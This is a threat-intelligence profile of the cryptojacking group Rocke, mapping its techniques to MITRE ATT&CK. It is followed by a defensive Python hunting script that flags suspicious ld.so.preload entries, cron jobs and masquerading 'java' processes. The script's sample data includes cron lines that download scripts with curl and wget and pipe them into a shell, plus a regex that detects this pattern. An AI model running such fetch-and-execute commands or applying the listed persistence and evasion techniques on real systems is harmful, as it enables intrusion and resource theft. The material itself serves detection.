
Threat Actor Characterization

Rocke

ID: 376fdbde9d142e90f864932fcf37b58645882
Category: Cybercrime (Cybercriminal)
Threat types: Cryptomining, Intrusion, Cloud Targeting
Country: China
Operation zone: UNKNOWN
Updated: 2026-01-13
Created: 2025-10-21
Progress: 35%; Completeness: 28%; Freshness: 50%
Aliases: none registered.
MITRE ATT&CK®

Rocke is an alleged Chinese-speaking adversary whose primary objective appeared to be cryptojacking, or stealing victim system resources for the purposes of mining cryptocurrency. The name Rocke comes from the email address "[email protected]" used to create the wallet which held collected cryptocurrency. Researchers have detected overlaps between Rocke and the Iron Cybercrime Group, though this attribution has not been confirmed. Ref: https://attack.mitre.org/groups/G0106/


Technique | Technique name | Tactics | Evidence
T1021.004 | Remote Services: SSH | TA0008 | Rocke has spread its coinminer via SSH.
T1027.002 | Obfuscated Files or Information: Software Packing | TA0005 | Rocke's miner has created UPX-packed files in the Windows Start Menu folder.
T1027.004 | Obfuscated Files or Information: Compile After Delivery | TA0005 | Rocke has compiled malware, delivered to victims as .c files, with the GNU Compiler Collection (GCC).
T1036.005 | Masquerading: Match Legitimate Resource Name or Location | TA0005 | Rocke has used shell scripts which download mining executables and save them with the filename "java".
T1053.003 | Scheduled Task/Job: Cron | TA0002, TA0003, TA0004 | Rocke installed a cron job that downloaded and executed files from the C2.
T1055.002 | Process Injection: Portable Executable Injection | TA0004, TA0005 | Rocke's miner, "TermsHost.exe", evaded defenses by injecting itself into Windows processes, including Notepad.exe.
T1059.004 | Command and Scripting Interpreter: Unix Shell | TA0002 | Rocke used shell scripts to run commands which would obtain persistence and execute the cryptocurrency mining malware.
T1059.006 | Command and Scripting Interpreter: Python | TA0002 | Rocke has used Python-based malware to install and spread their coinminer.
T1070.002 | Indicator Removal: Clear Linux or Mac System Logs | TA0005 | Rocke has cleared log files within the /var/log/ folder.
T1070.004 | Indicator Removal: File Deletion | TA0005 | Rocke has deleted files on infected machines.
T1070.006 | Indicator Removal: Timestomp | TA0005 | Rocke has changed the time stamp of certain files.
T1071.001 | Application Layer Protocol: Web Protocols | TA0011 | Rocke has executed wget and curl commands to Pastebin over the HTTPS protocol.
T1102.001 | Web Service: Dead Drop Resolver | TA0011 | Rocke has used Pastebin to check the version of beaconing malware and redirect to another Pastebin hosting updated malware.
T1222.002 | File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification | TA0005 | Rocke has changed file permissions of files so they could not be modified.
T1496.001 | Resource Hijacking: Compute Hijacking | TA0040 | Rocke has distributed cryptomining malware.
T1518.001 | Software Discovery: Security Software Discovery | TA0007 | Rocke used scripts which detected and uninstalled antivirus software.
T1543.002 | Create or Modify System Process: Systemd Service | TA0003, TA0004 | Rocke has installed a systemd service script to maintain persistence.
T1547.001 | Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder | TA0003, TA0004 | Rocke's miner has created UPX-packed files in the Windows Start Menu folder.
T1552.004 | Unsecured Credentials: Private Keys | TA0006 | Rocke has used SSH private keys on the infected machine to spread its coinminer throughout a network.
T1562.001 | Impair Defenses: Disable or Modify Tools | TA0005 | Rocke used scripts which detected and uninstalled antivirus software.
T1562.004 | Impair Defenses: Disable or Modify System Firewall | TA0005 | Rocke used scripts which killed processes and added firewall rules to block traffic related to other cryptominers.
T1564.001 | Hide Artifacts: Hidden Files and Directories | TA0005 | Rocke downloaded a file "libprocesshider", which could hide files on the target system.
T1574.006 | Hijack Execution Flow: Dynamic Linker Hijacking | TA0003, TA0004, TA0005 | Rocke has modified /etc/ld.so.preload to hook libc functions in order to hide the installed dropper and mining software in process lists.
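The following is an added host-hunting example, not code from this profile or its platform, that turns three of the Linux techniques above (ld.so.preload hijacking, cron jobs pulling from a paste site, a miner masquerading as "java") into simple checks. The host snapshot, the paste URL and the file paths are constructed for the demo; the list of legitimate JVM locations is an assumption to tune per environment.

```python
import re

# Constructed host snapshot: every path, URL and address here is made up for the demo.
SNAPSHOT = {
    "ld_preload": "/usr/local/lib/libprocesshider.so\n",
    "cron": [
        "0 3 * * * root /usr/bin/apt-get update -q",
        "*/10 * * * * root curl -fsSL https://pastebin.com/raw/EXAMPLE | sh",
        "* * * * * root wget -q -O - http://203.0.113.5/x.sh | bash",
    ],
    "procs": [("java", "/usr/lib/jvm/java-17/bin/java"), ("java", "/tmp/java")],
}

PASTE_HOSTS = ("pastebin.com",)  # dead-drop host named in the profile
JAVA_OK = ("/usr/lib/jvm/", "/usr/bin/java", "/opt/java/")  # assumed legitimate JVM paths
FETCH_PIPE = re.compile(r"\b(curl|wget)\b[^|]*\|\s*(ba)?sh\b")  # download piped into a shell

def check_ld_preload(content: str) -> list[str]:
    """A clean host has an empty or absent /etc/ld.so.preload; any entry needs review."""
    return [ln.strip() for ln in content.splitlines() if ln.strip() and not ln.startswith("#")]

def check_cron(lines: list[str]) -> list[str]:
    """Flag cron jobs that pipe downloaded content into a shell or reach a paste site."""
    return [ln for ln in lines if FETCH_PIPE.search(ln) or any(h in ln for h in PASTE_HOSTS)]

def check_procs(procs: list[tuple[str, str]]) -> list[str]:
    """Flag a process named 'java' whose executable sits outside the expected JVM locations."""
    return [exe for name, exe in procs if name == "java" and not exe.startswith(JAVA_OK)]

def hunt(snapshot: dict) -> dict:
    """Run every check and return only the non-empty findings, keyed by ATT&CK technique."""
    findings = {
        "T1574.006": check_ld_preload(snapshot["ld_preload"]),
        "T1053.003/T1102.001": check_cron(snapshot["cron"]),
        "T1036.005": check_procs(snapshot["procs"]),
    }
    return {k: v for k, v in findings.items() if v}

if __name__ == "__main__":
    for technique, hits in hunt(SNAPSHOT).items():
        print(technique)
        for hit in hits:
            print("   ", hit)
```

On a live host, populate the snapshot from /etc/ld.so.preload, the system and user crontabs, and /proc/<pid>/exe links rather than the constructed values.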